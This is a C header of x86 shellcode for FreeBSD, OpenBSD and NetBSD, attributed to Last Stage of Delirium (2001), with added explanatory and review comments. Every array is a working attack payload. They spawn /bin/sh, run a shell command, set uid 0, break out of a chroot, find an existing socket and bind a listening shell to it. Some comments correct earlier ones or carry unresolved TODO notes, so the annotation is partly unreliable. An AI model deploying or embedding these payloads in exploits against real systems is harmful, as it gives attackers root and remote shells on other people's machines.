/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland        *://lsd-pl.net/ #*/
/*## asmcodes for freebsd 3.4 openbsd 2.8 netbsd 1.5 x86                     #*/

/*
syscall     %eax stack 
----------- ---- ---------------------------------------------------------------
execve      x03b ret,->path="/bin//sh",->[->a0=0],0
execve      x03b ret,->path="/bin//sh",->[->a0=path,->a1="-c",->a2=cmd,0],0
setuid      x017 ret,uid=0
mkdir       x088 ret,->path="b..",mode=any (any value is accepted)
chroot      x03d ret,->path={"b..","."}
chdir       x00c ret,->path=".."
getpeername x01f ret,sfd,->sadr=[],->[len=0x10]
socket      x061 ret,AF_INET=2,SOCK_STREAM=1,prot=0
bind        x068 ret,sfd,->sadr=[0xff,2,hi,lo,0,0,0,0],->[0x10]
listen      x06a ret,sfd,backlog=5
accept      x01e ret,sfd,0,0
dup2        x05a ret,sfd,fd={0,1,2}
*/

#if defined(X86) && ( defined(OPENBSD) || defined(FREEBSD) || defined(NETBSD) )

/*
 * execve("/bin//sh", argv -> [NULL], envp = NULL) through int $0x80.
 * Stack layout follows the first execve row of the table above: a dummy
 * return slot, then the arguments.  The byte sequence is the payload
 * itself and must stay exactly as listed; such fixed sequences are also
 * what static signature matching in detection tooling keys on.
 */
char shellcode[]=          /* 23 bytes                       */
    "\x31\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */ /* string terminator */
    "\x68""//sh"           /* pushl   $0x68732f2f            */
    "\x68""/bin"           /* pushl   $0x6e69622f            */
    "\x89\xe3"             /* movl    %esp,%ebx              */ /* %ebx = path */
    "\x50"                 /* pushl   %eax                   */ /* the NULL that argv points at */
    "\x54"                 /* pushl   %esp                   */ /* argv = &NULL above; acts as envp? no: envp is the 0 below */
    "\x53"                 /* pushl   %ebx                   */ /* path */
    "\x50"                 /* pushl   %eax                   */ /* dummy return slot */
    "\xb0\x3b"             /* movb    $0x3b,%al              */ /* SYS_execve (x03b) */
    "\xcd\x80"             /* int     $0x80                  */
;

/*
 * execve("/bin//sh", {path, "-c", cmd, NULL}, NULL) -- second execve row
 * of the table.  The command string is expected to follow the trailing
 * call: jmp -> call -> popl %ecx leaves its address in %ecx, which is why
 * the stated size is 44 plus the command length.  Bytes are the payload
 * and must stay exactly as listed.
 */
char cmdshellcode[]=       /* 44+cmdlen bytes                */
    "\xeb\x25"             /* jmp     <cmdshellcode+39>      */ /* to the call at the end */
    "\x59"                 /* popl    %ecx                   */ /* %ecx = address of the command */
    "\x31\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */
    "\x68""//sh"           /* pushl   $0x68732f2f            */
    "\x68""/bin"           /* pushl   $0x6e69622f            */
    "\x89\xe3"             /* movl    %esp,%ebx              */ /* %ebx = path */
    "\x50"                 /* pushl   %eax                   */
    "\x66\x68""-c"         /* pushw   $0x632d                */
    "\x89\xe7"             /* movl    %esp,%edi              */ /* %edi = "-c" */
    "\x50"                 /* pushl   %eax                   */ /* argv[3] = NULL */
    "\x51"                 /* pushl   %ecx                   */ /* argv[2] = cmd */
    "\x57"                 /* pushl   %edi                   */ /* argv[1] = "-c" */
    "\x53"                 /* pushl   %ebx                   */ /* argv[0] = path */
    "\x89\xe7"             /* movl    %esp,%edi              */ /* %edi = argv */
    "\x50"                 /* pushl   %eax                   */ /* envp = NULL */
    "\x57"                 /* pushl   %edi                   */ /* argv */
    "\x53"                 /* pushl   %ebx                   */ /* path */
    "\x50"                 /* pushl   %eax                   */ /* dummy return slot */
    "\xb0\x3b"             /* movb    $0x3b,%al              */ /* SYS_execve (x03b); earlier comment said $0x0b, which is the Linux number, not these bytes */
    "\xcd\x80"             /* int     $0x80                  */
    "\xe8\xd6\xff\xff\xff" /* call    <cmdshellcode+2>       */ /* pushes the address of what follows */
    /* command */
;

/*
 * setuid(0) -- setuid row of the table.  Note the size: the five
 * instructions below total 8 bytes (2+1+2+1+2), not 7 as previously
 * commented; anything that copies this array by its stated length
 * rather than sizeof would drop the final byte.
 */
char setuidcode[]=         /* 8 bytes                        */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */ /* uid = 0 */
    "\xb0\x17"             /* movb    $0x17,%al              */ /* SYS_setuid (x017) */
    "\x50"                 /* pushl   %eax                   */ /* dummy return slot */
    "\xcd\x80"             /* int     $0x80                  */
;
 
/*
 * mkdir("b..") ; chroot("b..") ; 255 x chdir("..") ; chroot(".") -- the
 * mkdir/chroot/chdir rows of the table.  "b..." is pushed as one dword
 * and its 4th byte is overwritten with 0, so %edi points at "b..";
 * each incl %edi then advances the path to ".." and finally ".".
 * Bytes are the payload and must stay exactly as listed.
 */
char chrootcode[]=         /* 44 bytes                       */
    "\x68""b..."           /* pushl   $0x2e2e2e62            */
    "\x89\xe7"             /* movl    %esp,%edi              */ /* %edi = "b..." */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\x88\x47\x03"         /* movb    %al,0x3(%edi)          */ /* terminate -> "b.." */
    "\x57"                 /* pushl   %edi                   */ /* path */
    "\xb0\x88"             /* movb    $0x88,%al              */ /* SYS_mkdir (x088); mode slot holds leftover stack data, any value accepted */
    "\x50"                 /* pushl   %eax                   */ /* dummy return slot */
    "\xcd\x80"             /* int     $0x80                  */
    "\x57"                 /* pushl   %edi                   */ /* path "b.." */
    "\xb0\x3d"             /* movb    $0x3d,%al              */ /* SYS_chroot (x03d) */
    "\x50"                 /* pushl   %eax                   */
    "\xcd\x80"             /* int     $0x80                  */
    "\x47"                 /* incl    %edi                   */ /* %edi = ".." */
    "\x33\xc9"             /* xorl    %ecx,%ecx              */
    "\xb1\xff"             /* movb    $0xff,%cl              */ /* loop count 255 */
    "\x57"                 /* pushl   %edi                   */ /* <chrootcode+29>: loop body start is the movb below */
    "\x50"                 /* pushl   %eax                   */
    "\xb0\x0c"             /* movb    $0x0c,%al              */ /* SYS_chdir (x00c) */
    "\xcd\x80"             /* int     $0x80                  */
    "\xe2\xfa"             /* loop    <chrootcode+31>        */ /* repeats from the movb $0x0c; stack grows by nothing since no pushes are inside the loop */
    "\x47"                 /* incl    %edi                   */ /* %edi = "." */
    "\x57"                 /* pushl   %edi                   */
    "\xb0\x3d"             /* movb    $0x3d,%al              */ /* SYS_chroot (x03d) */
    "\x50"                 /* pushl   %eax                   */
    "\xcd\x80"             /* int     $0x80                  */
;

/*
 * Socket finder -- getpeername and dup2 rows of the table.  A sockaddr
 * buffer is carved at %esi-0x7c (so this code assumes %esi holds a
 * usable stack address on entry -- environment-dependent, TODO confirm
 * for the target binary), getpeername (x01f) is tried on descriptors
 * from 0xff downward, and a descriptor is accepted when the call
 * succeeds and the port word at +2 of the returned sockaddr equals the
 * 0x1234 placeholder (the word at FINDSCKPORTOFS).  That descriptor is
 * then dup2'd onto 2, 1 and 0.  Bytes must stay exactly as listed.
 */
char findsckcode[]=        /* 59 bytes                       */
    "\x56"                 /* pushl   %esi                   */
    "\x5f"                 /* popl    %edi                   */ /* %edi = %esi */
    "\x83\xef\x7c"         /* subl    $0x7c,%edi             */ /* %edi = sockaddr buffer */
    "\x57"                 /* pushl   %edi                   */
    "\xb0\x10"             /* movb    $0x10,%al              */ /* NOTE(review): no xorl %eax first, so the upper bytes of the length stored by stosl are whatever %eax held on entry -- presumably tolerated by getpeername, verify */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */ /* *len = 0x10; %edi now past it */
    "\x57"                 /* pushl   %edi                   */ /* sadr */
    "\x31\xc9"             /* xorl    %ecx,%ecx              */
    "\xb1\xff"             /* movb    $0xff,%cl              */ /* first fd to probe */
    "\x51"                 /* pushl   %ecx                   */ /* <findsckcode+14>: sfd */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\xb0\x1f"             /* movb    $0x1f,%al              */ /* SYS_getpeername (x01f) */
    "\x51"                 /* pushl   %ecx                   */ /* dummy return slot */
    "\xcd\x80"             /* int     $0x80                  */
    "\x59"                 /* popl    %ecx                   */
    "\x59"                 /* popl    %ecx                   */ /* %ecx = sfd again */
    "\x33\xdb"             /* xorl    %ebx,%ebx              */
    "\x3b\xc3"             /* cmpl    %ebx,%eax              */ /* call failed? */
    "\x75\x0a"             /* jne     <findsckcode+40>       */ /* -> loop, next fd */
    "\x66\xbb\x12\x34"     /* movw    $0x1234,%bx            */ /* port placeholder */
    "\x66\x39\x5f\x02"     /* cmpw    %bx,0x2(%edi)          */ /* sin_port of the peer */
    "\x74\x02"             /* je      <findsckcode+42>       */ /* match: fall into dup2 */
    "\xe2\xe4"             /* loop    <findsckcode+14>       */
    "\x51"                 /* pushl   %ecx                   */ /* <findsckcode+42>: sfd */
    "\x50"                 /* pushl   %eax                   */ /* dummy return slot (0) */
    "\x91"                 /* xchgl   %ecx,%eax              */ /* %eax = sfd, %ecx = 0 */
    "\xb1\x03"             /* movb    $0x03,%cl              */
    "\x49"                 /* decl    %ecx                   */ /* <findsckcode+47>: fd = 2, 1, 0 */
    "\x89\x4c\x24\x08"     /* movl    %ecx,0x8(%esp)         */ /* second dup2 argument */
    "\x41"                 /* incl    %ecx                   */
    "\xb0\x5a"             /* movb    $0x5a,%al              */ /* SYS_dup2 (x05a) */
    "\xcd\x80"             /* int     $0x80                  */
    "\xe2\xf4"             /* loop    <findsckcode+47>       */
;

/*
 * Listening socket -- socket/bind/listen/accept/dup2 rows of the table.
 * The sockaddr is built from the single dword 0x341202ff (bytes
 * ff 02 12 34: sa_len, AF_INET, port 0x1234 placeholder -- the word at
 * BINDSCKPORTOFS) followed by a zero address; the accepted descriptor is
 * dup2'd onto 2, 1 and 0.  Bytes must stay exactly as listed.
 */
char bindsckcode[]=        /* 70 bytes                       */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\x68\xff\x02\x12\x34" /* pushl   $0x341202ff            */ /* sockaddr head */
    "\x89\xe7"             /* movl    %esp,%edi              */ /* %edi = sockaddr */
    "\x50"                 /* pushl   %eax                   */ /* prot = 0 */
    "\x6a\x01"             /* pushl   $0x01                  */ /* SOCK_STREAM */
    "\x6a\x02"             /* pushl   $0x02                  */ /* AF_INET */
    "\xb0\x61"             /* movb    $0x61,%al              */ /* SYS_socket (x061) */
    "\x50"                 /* pushl   %eax                   */ /* dummy return slot */
    "\xcd\x80"             /* int     $0x80                  */
    "\x8b\xd8"             /* movl    %eax,%ebx              */ /* %ebx = sfd */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\x89\x47\x04"         /* movl    %eax,0x4(%edi)         */ /* sin_addr = 0 */
    "\x6a\x10"             /* pushl   $0x10                  */ /* addrlen (push imm8, sign-extended) */
    "\x57"                 /* pushl   %edi                   */
    "\x53"                 /* pushl   %ebx                   */
    "\xb0\x68"             /* movb    $0x68,%al              */ /* SYS_bind (x068) */
    "\x50"                 /* pushl   %eax                   */
    "\xcd\x80"             /* int     $0x80                  */
    "\x6a\x05"             /* pushl   $0x05                  */ /* backlog (push imm8) */
    "\x53"                 /* pushl   %ebx                   */
    "\xb0\x6a"             /* movb    $0x6a,%al              */ /* SYS_listen (x06a) */
    "\x50"                 /* pushl   %eax                   */
    "\xcd\x80"             /* int     $0x80                  */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */ /* addrlen = NULL */
    "\x50"                 /* pushl   %eax                   */ /* addr = NULL */
    "\x53"                 /* pushl   %ebx                   */
    "\xb0\x1e"             /* movb    $0x1e,%al              */ /* SYS_accept (x01e) */
    "\x50"                 /* pushl   %eax                   */
    "\xcd\x80"             /* int     $0x80                  */ /* %eax = accepted fd */
    "\x50"                 /* pushl   %eax                   */ /* sfd for dup2 */
    "\x50"                 /* pushl   %eax                   */ /* dummy return slot */
    "\x91"                 /* xchgl   %ecx,%eax              */
    "\xb1\x03"             /* movb    $0x03,%cl              */
    "\x49"                 /* decl    %ecx                   */ /* <bindsckcode+58>: fd = 2, 1, 0 */
    "\x89\x4c\x24\x08"     /* movl    %ecx,0x8(%esp)         */ /* second dup2 argument */
    "\x41"                 /* incl    %ecx                   */
    "\xb0\x5a"             /* movb    $0x5a,%al              */ /* SYS_dup2 (x05a) */
    "\xcd\x80"             /* int     $0x80                  */
    "\xe2\xf4"             /* loop    <bindsckcode+58>       */
;

/*
 * Stack-pointer trampoline: returns to whatever address is on top of the
 * stack with %eax left equal to %esp.  How it is placed is decided by the
 * code that uses this file, not here.
 */
char jump[]=               /* 3 bytes                        */
    "\x8b\xc4"             /* movl    %esp,%eax              */
    "\xc3"                 /* ret                            */
;

/*
 * Byte offsets of the 0x1234 port placeholder words inside the arrays
 * above: in findsckcode the immediate of the movw at +30 sits at +32; in
 * bindsckcode the pushl immediate at +2 puts it at +5.  BINDSCKPORTOFS is
 * written as the octal literal 05, which is simply 5.  BSD is a feature
 * flag for other translation units (consumers are outside this file --
 * TODO confirm).
 */
#define FINDSCKPORTOFS     32
#define BINDSCKPORTOFS     05
#define BSD

#endif
